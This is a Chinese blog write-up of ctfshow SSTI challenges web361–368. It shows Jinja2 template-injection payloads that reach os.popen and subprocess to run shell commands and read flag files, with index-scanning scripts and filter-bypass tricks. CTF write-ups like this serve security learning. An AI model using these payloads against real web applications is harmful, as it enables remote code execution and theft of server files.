CTFSHOW SSTI

已于 2023-09-30 16:40:14 修改
阅读量229 收藏 1
点赞数
分类专栏: CTFshow 文章标签: SSTI
于 2023-09-30 16:34:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/133349707
版权
文章介绍了如何在Web应用程序安全漏洞测试(SSTI)中,通过各种方法绕过过滤机制,如使用payload、特殊字符编码、类和方法调用,以及利用不同框架的功能,以获取控制并执行代码。作者分享了多个实例,包括计算长度、脚本输出、特殊字符组合等策略。
摘要由CSDN通过智能技术生成

目录

web361   【无过滤】

subprocess.Popen

os._wrap_close

url_for

lipsum

cycler

web362   【过滤数字】

第一个通过 计算长度来实现

第二个使用脚本输出另一个数字来绕过

使用没有数字的payload

web363   【过滤引号】

使用getitem  自定义变量

web364   【过滤 args和引号】

chr

web365   【过滤中括号】

getitem()

web366   【过滤下划线】

attr

web367   【过滤os】

get(request.values.a)

web368   【过滤{{】

最近搞了几题SSTI 有点意思

做一下CTFSHOW的吧

web361   【无过滤】

名字就是考点

这题简单直接payload 和过程了

?name={{7*7}} 

?name={{"".__class__.__base__.__subclasses__()}}

这里贴上一下脚本 用来查找位数

import time

import  requests



base_url="http://d30af560-b595-44ce-b476-e5681156b059.challenge.ctf.show/?name="
for i in range(200):
    payload="{{\"\".__class__.__base__.__subclasses__()[%s]}}"%i
    r= requests.get(url=base_url+payload)
    if "subprocess.Popen" in r.text:
        print(i)
    if r.status_code == 429:
        time.sleep(0.5)

简单的我就使用多点方法


subprocess.Popen

/?name={{"".__class__.__base__.__subclasses__()[407]}}
/?name={{"".__class__.__base__.__subclasses__()[407]("ls",shell=True,stdout=-1).communicate()[0].strip()}}

os._wrap_close

?name={{"".__class__.__base__.__subclasses__()[132]}}

/?name={{"".__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']("ls").read()}}

/?name={{"".__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']("ls /").read()}}

/?name={{"".__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']("cat /f*").read()}}

url_for

{{url_for.__globals__}}

{{url_for.__globals__["current.app"].config}}

但是这里没有

 下面是

推测可能是 twig 和 Jinja2 使用

lipsum

?name={{lipsum.__globals__}}

?name={{lipsum.__globals__['os']}}

{{lipsum.__globals__['os'].popen("ls").read()}}

{{lipsum.__globals__['os'].popen("cat /f*").read()}}

cycler

?name={{cycler.__init__.__globals__}}

?name={{cycler.__init__.__globals__.os.popen("ls /").read()}}

?name={{cycler.__init__.__globals__.os.popen("cat /f*").read()}}

不写了 太多了

还是需要理解 一旦出现过滤 这种直接复制粘贴是没有用的 最好在 python中多看看

web362   【过滤数字】

这里过滤了数字

我们有两个方法

第一个通过 计算长度来实现

{% set a='aaaaaa'|length %}{{ ().__class__.__base__.__subclasses__()[a] }}

但是这个需要拼接很多

所以放弃

第二个使用脚本输出另一个数字来绕过

def half2full(half):  
    full = ''  
    for ch in half:  
        if ord(ch) in range(33, 127):  
            ch = chr(ord(ch) + 0xfee0)  
        elif ord(ch) == 32:  
            ch = chr(0x3000)  
        else:  
            pass  
        full += ch  
    return full  
t=''
s="0123456789"
for i in s:
    t+='\''+half2full(i)+'\','
print(t)


'0','1','2','3','4','5','6','7','8','9',

132
/?name={{"".__class__.__base__.__subclasses__()[132].__init__.__globals__.popen("cat /f*").read()}}

使用没有数字的payload

?name={{lipsum.__globals__['os'].popen("cat /flag").read()}}

web363   【过滤引号】

这里可以使用构造request方式绕过 这里过滤了引号

我们需要构造无引号的

这里可以记住 过滤了引号 我们就可以通过括号来查找

使用getitem  自定义变量

这里可以使用自定义的变量来绕过 request.values.a 类似于自己定义的变量

只需要在}}后面传递参数即可

{{().__class__.__mro__[1].__subclasses__()}}


/?name={{().__class__.__mro__[1].__subclasses__()[].__init__.__globals__.__getitem__(request.values.a)}}&a=popen

这里是我们需要跑的脚本类型

我们需要找到popen来执行命令 我们就可以通过遍历类 然后通过__getitem__找到方法request
然后来查询popen

写个脚本

import requests

baseurl="http://c48f6cc8-a4d6-4783-86af-982c96cf190e.challenge.ctf.show/?name="

for i in range(1000):
    payload="""{{().__class__.__mro__[1].__subclasses__()[%i].__init__.__globals__.__getitem__(request.values.a)}}&a=popen"""%i
    r=requests.get(url=baseurl+payload)
    if "popen" in r.text:
        print(i)
    else:
        continue

跑出来132

{{().__class__.__mro__[1].__subclasses__()[132].__init__.__globals__.__getitem__(request.values.a)(request.values.b).read()}}&a=popen&b=ls


/?name={{().__class__.__mro__[1].__subclasses__()[132].__init__.__globals__.__getitem__(request.values.a)(request.values.b).read()}}&a=popen&b=cat /flag

web364   【过滤 args和引号】

这里其实使用上一题的方法还是可以

/?name={{().__class__.__mro__[1].__subclasses__()[132].__init__.__globals__.__getitem__(request.values.a)(request.values.b).read()}}&a=popen&b=cat /flag

这里介绍一下另一个方法chr 方法

chr

import requests

baseurl="http://c48f6cc8-a4d6-4783-86af-982c96cf190e.challenge.ctf.show/?name="

for i in range(1000):
    payload="""{{().__class__.__mro__[1].__subclasses__()[%s].__init__.__globals__.__builtins__.chr}}"""%i
    r=requests.get(url=baseurl+payload)
    if "chr" in r.text:
        print(i)
    else:
        continue

通过脚本 寻找存在chr方法的类

然后使用 框架表达式 {{%%}}声明变量

来声明 chr的方法

?name={%set+chr=().__class__.__mro__[1].__subclasses__()[80].__init__.__globals__.__builtins__.chr%}{{().__class__.__mro__[1].__subclasses__()[132].__init__.__globals__.popen(chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)).read()}}



这里是两块
{% set chr=().__class__.__mro__[1].__subclasses__()[80].__init__.__globals__.__builtins__.chr%}

第一块 来设置chr


第二块
{{().__class__.__mro__[1].__subclasses__()[132].__init__.__globals__.popen(chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)).read()}}

这里的chr() 是 cat /f*

web365   【过滤中括号】

这里比上一题多了中括号的过滤

getitem()

__golbals__[123]

__golbals__.__getitem__(123)

这两个 是没有区别的

所以遇到了中括号我们可以运用这个方式来做

?name={{().__class__.__mro__.__getitem__(1).__subclasses__().__getitem__(132).__init__.__globals__.popen(request.values.a).read()}}&a=ls


?name={{().__class__.__mro__.__getitem__(1).__subclasses__().__getitem__(132).__init__.__globals__.popen(request.values.a).read()}}&a=cat /f*

web366   【过滤下划线】

这里接着上面的内容过滤了下划线

attr

().__class__


()|attr('__class__') 这两个是一样的


但是这个题目过滤了_ 

我们可以使用request来绕过


(lipsum|attr(request.values.a))   &a=__class__

直接构造payload

{{lipsum|attr(request.values.b)}}&b=__globals__


{{(lipsum|attr(request.values.b)).os}}&b=__globals__



{{(lipsum|attr(request.values.b)).os.popen(request.values.c).read()}}&b=__globals__&c=ls

{{(lipsum|attr(request.values.b)).os.popen(request.values.c).read()}}&b=__globals__&c=cat /f*

web367   【过滤os】

这里在上面的基础上过滤了os

这里需要使用 get(request.values.a) 来获取os

其余和上面一样即可

get(request.values.a)

?name={{(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read()}}&a=__globals__&b=os&c=cat /f*

web368   【过滤{{】

这里我们过滤了{{ 但是没有过滤其他表达式

我们通过 {% %}

表达式修改一下即可

?name={%+print(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read()%}&a=__globals__&b=os&c=ls


?name={%+print(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read()%}&a=__globals__&b=os&c=cat /f*

双层小牛堡
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
fenjing工具,ssti
12-17
标题中的“fenjing工具,ssti”指的是Fenjing,一个可能用于安全测试或Web应用漏洞扫描的工具,而“ssti”则是Server-Side Template Injection(服务器端模板注入)的缩写,这是一种常见的Web应用程序安全漏洞。...
Ctfshow web入门 SSTI 模板注入篇 web361-web372 详细题解 全
Jay17的博客
08-10 1389
Ctfshow web入门 SSTI 模板注入篇 web361-web372 详细题解 全
SSTI模板注入漏洞详解(包含ctfshow web入门361)
T1ngSh0w的博客
03-16 1366
服务端接收了攻击者的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了攻击者插入的可以破坏模板的语句,从而达到攻击者的目的。
ctfshow web入门 SSTI注入 web361--web368
最新发布
2301_81040377的博客
05-15 371
过滤了中括号 下划线 单引号 双引号 globals、getitem args。说实话这里对py不太好的朋友有点不友好,因为payload都是py的。这里用popen方法来执行命令。上题一样的payload可以用。这里是把引号过滤了我们可以用。然后使用flask过滤器。上题一样的payload。hint:考点就是题目。
ctfshow web入门 ssti web361~web372
qq_62989306的博客
09-13 1325
ssti之数字绕过、request绕过、字符串拼接、chr绕过、反弹绕过、dnslog外带、读文件盲注……
【Web】Ctfshow SSTI刷题记录1
uuzeray的博客
11-19 1216
题目给到Hint,尝试传?name={{1-1}}测试出ssti注入点。使用{%%}绕过,再借助print()回显。
web入门361~372SSTI
pandasaymmm的博客
03-18 100
SSTI(Server-Side TemplateInjection)服务端模板注入攻击,通过与服务端模板的输入输出交互,在过滤不严格的情况下,构造恶意输入数据,从而达到读取文件或者getshell的目的。
SSTI
03-09
**SSTI(Server-Side Template Injection)**是一种严重的网络安全漏洞,主要出现在使用服务器端模板引擎的Web应用程序中。这种漏洞允许攻击者注入恶意代码到服务器端模板,从而执行任意服务器端代码,获取敏感信息...
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
flaskssti:测试SSTI
02-21
标题中的“flaskssti”指的是一个与Python web框架Flask相关的项目,可能是一个扩展或教程,专注于“SSTI”(Server-Side Template Injection,服务器端模板注入)。SSTI是一种安全漏洞,允许攻击者通过操纵模板引擎...
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板。 模板引擎旨在通过将固定模板与易失性数据结合来生成网页。...
SSTI原理以及ctf.show的SSTI(web361-web362)
wanan的博客
09-30 699
SSTI原理以及ctf.show的SSTI(web361-web362)
ctfshow-web368(SSTI)
m0_62094846的博客
05-05 474
用上两题的方法,有东西被过滤了 两个大括号被过滤了 也不知道是什么意思 ?name={% set po=dict(po=a,p=a)|join%} {% set a=(()|select|string|list)|attr(po)(24)%} {% set ini=(a,a,dict(init=a)|join,a,a)|join()%} {% set glo=(a,a,dict(globals=a)|join,a,a)|join()%} {% set geti=(a,a,dict(geti...
ctfshow web入门(SSTI
m0_62422842的博客
06-18 1348
ctfshow的web入门中ssti题目的总结
SSTI模板注入-ctfshow web入门362
T1ngSh0w的博客
03-17 274
ctfshow web入门362详细讲解
SSTI练习 web361--web372
qing_chuan_的博客
06-15 212
我一步一步试了试,过滤了几个数字2,3等,正好把我可用的os模块没法用了,上网看了好多大佬们的wp可以用全角数字来代替正常数字。这里要提醒我自己一下,这里到用到use_for,自己在哪里拼了半天就是不对。要寄漏,原来过了单双引号啊,当然要用老方法了,request拼接。用subprocess.Popen(),也不行。这题开始过滤了,过了啥,上一题大佬的脚本仍然可以用。哈哈哈,终于到了{}了,直接{%%}+print。加了args过滤,用cookie就好了。上一题全角数字的不能用了。
ctfshow-web361(SSTI)
m0_62094846的博客
04-23 593
看到Hello,猜测输入的参数是name
ctfshow-web362(SSTI)
m0_62094846的博客
04-23 295
?name={{"".__class__.__bases__[0].__subclasses__()}} 一直到这一步都是正常的 从12开始就没用了 数字出现了问题,看wp用全角数字代替正常数字绕过 ?name={{"".__class__.__bases__[0].__subclasses__()[132]}} 然后应该可以用正常方法做了 ?name={{"".__class__.__bases__[0].__subclasses__()[132].__init__....
ctfshow ssti
07-27
CTFShow SSTI(Server-Side Template Injection)是一个与安全相关的话题,它涉及到服务器端模板注入漏洞。在某些情况下,当应用程序接受用户输入并将其作为模板的一部分进行解析时,攻击者可以利用这个漏洞来执行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值